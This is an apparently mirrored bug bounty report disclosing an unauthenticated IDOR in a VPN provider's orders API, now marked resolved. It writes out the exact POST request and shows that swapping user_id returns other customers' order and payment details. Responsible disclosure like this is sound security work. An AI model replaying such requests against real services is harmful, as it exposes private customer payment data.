Loading HuntDB...

IDOR allow access to payments data of any user

High
N
Nord Security
Submitted None
Reported by dakitu

Vulnerability Details

Technical details and impact analysis

Insecure Direct Object Reference (IDOR)
simple send this POST request (no need any auth): `POST /api/v1/orders HTTP/1.1 Host: join.nordvpn.com Accept: application/json Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 179 DNT: 1 Connection: close` `{"payment":{"provider_method_account":"6xdxdd","parameters":{}},"action":"order","plan_id":653,"user_id":20027039,"tax_country_code":"TW","payment_retry":0,"is_installment":false}` will respond: `{"id":42615458,"user_id":20027039,"confirmation":{"id":23093398,"created_at":"2019-12-04 17:01:35","updated_at":"2019-12-04 17:01:35","type":"redirect_post","value":"{\"url\":\"https:\\\/\\\/www.coinpayments.net\\\/index.php\",\"parameters\":{\"cmd\":\"_pay\",\"reset\":1,\"email\":\"█████\",\"merchant\":\"e64a9629f9a68cdeab5d0edd21b068d3\",\"currency\":\"USD\",\"amountf\":125.64,\"item_name\":\"VPN order\",\"invoice\":\"49476958\",\"success_url\":\"https:\\\/\\\/join.nordvpn.com\\\/payments\\\/callback\\\/264cae0b89e44a7bd263431b68d1122d\",\"cancel_url\":\"https:\\\/\\\/join.nordvpn.com\\\/order\\\/error\\\/?error_alert=payment&eu=1\",\"want_shipping\":0}}"}}` change user_id to 23093782 and you will get: `{"id":42616121,"user_id":89495166,"confirmation":{"id":23093782,"created_at":"2019-12-04 17:16:14","updated_at":"2019-12-04 17:16:14","type":"redirect","value":"https:\/\/pay.gocardless.com\/flow\/RE000W16X7XH4JCXJZ623MS6H7W316N3"}}` change id to 89495247 (my test account) and you will get: `{"id":42616142,"user_id":89495247,"confirmation":{"id":23093800,"created_at":"2019-12-04 17:16:48","updated_at":"2019-12-04 17:16:48","type":"redirect_post","value":"{\"url\":\"https:\\\/\\\/www.coinpayments.net\\\/index.php\",\"parameters\":{\"cmd\":\"_pay\",\"reset\":1,\"email\":\"[email protected]\",\"merchant\":\"e64a9629f9a68cdeab5d0edd21b068d3\",\"currency\":\"USD\",\"amountf\":125.64,\"item_name\":\"VPN order\",\"invoice\":\"49478089\",\"success_url\":\"https:\\\/\\\/join.nordvpn.com\\\/payments\\\/callback\\\/4513bd083a97e1b5c23c69096d89ac80\",\"cancel_url\":\"https:\\\/\\\/join.nordvpn.com\\\/order\\\/error\\\/?error_alert=payment&eu=0\",\"want_shipping\":0}}"}}` Just letting You know that i submited this bug today on [email protected] from lewiatan~@ cause i wasn't able to report it via hackerone. ## Impact leak sensitive customer data

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Insecure Direct Object Reference (IDOR)